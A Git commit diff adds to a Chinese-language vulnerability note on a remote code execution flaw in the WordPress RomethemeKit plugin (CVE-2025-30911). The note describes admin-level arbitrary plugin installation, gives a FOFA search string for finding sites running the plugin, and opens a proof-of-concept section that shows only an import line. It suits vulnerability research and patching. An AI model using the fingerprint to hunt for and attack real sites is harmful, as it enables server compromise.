Update WordPress RomethemeKit Plugin存在RCE漏洞(CVE-2025-30911).md

This commit is contained in:
Rainyseason 2025-04-07 14:16:51 +08:00 committed by GitHub
parent babf6d0cd5
commit a00eb6c922
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -3,6 +3,10 @@
## 漏洞描述
该漏洞允许经过身份验证的攻击者(具有管理员权限)以编程方式安装和激活任何插件(包括潜在的恶意插件),这可能导致在服务器上完全执行代码。
## fofa
```
"/wp-content/plugins/RomethemeKit"
```
## poc
```javascript
import requests